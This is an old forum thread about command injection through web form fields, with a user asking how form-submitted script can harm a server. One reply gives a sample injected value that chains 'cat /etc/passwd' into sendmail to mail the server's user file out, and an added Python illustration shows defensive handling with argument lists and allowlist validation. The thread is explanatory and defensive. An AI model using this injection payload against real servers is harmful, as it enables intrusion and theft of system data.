hack script and forms

steve

Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks
 
Brian

steve said:
Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks

Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.
 
Lee

Brian said:
Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.

I think he was trying to be clever.
open my ice = "open my eyes".
 
Brian

Lee said:
Brian said:

I think he was trying to be clever.
open my ice = "open my eyes".

Yeah, I read it that way... I still don't know what he is asking, and it is
likely the case for the other readers of this group.

Brian
 
Lee

Brian said:
Yeah, I read it that way... I still don't know what he is asking, and it is
likely the case for the other readers of this group.

Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.
 
620

Brian said:
Yeah, I read it that way... I still don't know what he is asking, and it is
likely the case for the other readers of this group.

Brian

....in other words, what's this I hear about people putting script (i.e.,
"var x = 0 / 0;") into the textbox of a form and submitting the form. What
happens thereafter, someone explain it to me, and what are the good and...
bead things about it.

And the answer is:

In order to open the Closed Eye of the Ice Demon, you'll need a Bottled Fire
Elemental (get that in the linux/apache ng). Once the Eye is open, you take
your Beads of the Deliquent Monk that you get in this ng and wrap them
around the Ancient Staff of Warding (I have no idea where you get an ASoW
these days, check google). Once the Beads are on the Staff, a localised
blaze will ignite on the staff, about 3/4 of the way up. Let it burn itself
out. A charred, round depression (socket) will be left. Put the Open eye
into the charred socket. This creates the Visionary Staff of Deliquency.
Come back and see me after you've obtained the staff and I'll show you how
to smite a form with it.
 
Brian

Lee said:
Brian said:

Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

Oh, in that case, the poster should stop being cute, and get to the point.
Basically, the answer is yes... it is very easy to screw with a badly
written server-side script.

For instance, let's say your script does something like:

exec("SomeShellFunction " + formValue + " someParameter");

and the user enters : something ; cat /etc/passwd | sendmail
(e-mail address removed);

That is a very simple example of making a mess, and finding all of the users
on the server :)

A good way to _start_ to prevent it, is to do some server-side variable
checking, and stripping illegal characters, such as ";`'@$ etc.

B
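
Brian's exec example, worked through as an added illustration (not code from the thread): `shell_view` shows how a shell would split the concatenated line without running it, and `run_without_shell` passes the same value as a single argument with no shell involved. It uses an allowlist check rather than the character stripping mentioned above; the function names, the allowlist pattern and the sample address are assumptions.

```python
import json
import re
import shlex
import subprocess
import sys

# Constructed sample input modelled on the value in the post (placeholder address).
FORM_VALUE = "something ; cat /etc/passwd | sendmail user@example.invalid;"
# Assumed allowlist: short name, no leading "-" so it cannot be read as an option.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def shell_view(form_value):
    """Tokenise the concatenated line as a POSIX shell would, without running it."""
    line = "SomeShellFunction " + form_value + " someParameter"
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def count_commands(tokens):
    """Count the separate commands the shell would see in the token list."""
    count, in_command = 0, False
    for tok in tokens:
        if tok in (";", "|", "&", "&&", "||"):
            in_command = False
        elif not in_command:
            count, in_command = count + 1, True
    return count


def run_without_shell(form_value):
    """Hand the value to a stand-in child program as one argv element (no shell)."""
    child = "import sys, json; print(json.dumps(sys.argv[1:]))"
    argv = [sys.executable, "-c", child, form_value, "someParameter"]
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return json.loads(done.stdout)


def validate(form_value):
    """Reject any value outside the allowlist before it reaches a command."""
    if not SAFE_VALUE.fullmatch(form_value):
        raise ValueError("form value rejected")
    return form_value


if __name__ == "__main__":
    print(count_commands(shell_view(FORM_VALUE)), "commands if a shell parses it")
    print(run_without_shell(FORM_VALUE), "is what the child sees without a shell")
```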
 
steve

Hi all
Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

Sorry about my English
I did not try to be clever, I just wont to know as Lee gas how does
that work and does it effect the server or the user computer.

For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts
and on the other hand
How can I use such script to harm somebody's computer or a server.

Thanks and I hope that you guys understand my English
 
Lee

steve said:
Sorry about my English

Sorry about guessing incorrectly.
I did not try to be clever, I just wont to know as Lee [guess] how does
that work and does it effect the server or the user computer.

The server.
For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts

If you're using a form to mail function provided by your ISP or some
other site, then you (and they) should be safe. People don't usually
have much need to write their own, so I'm assuming that's the case.
 
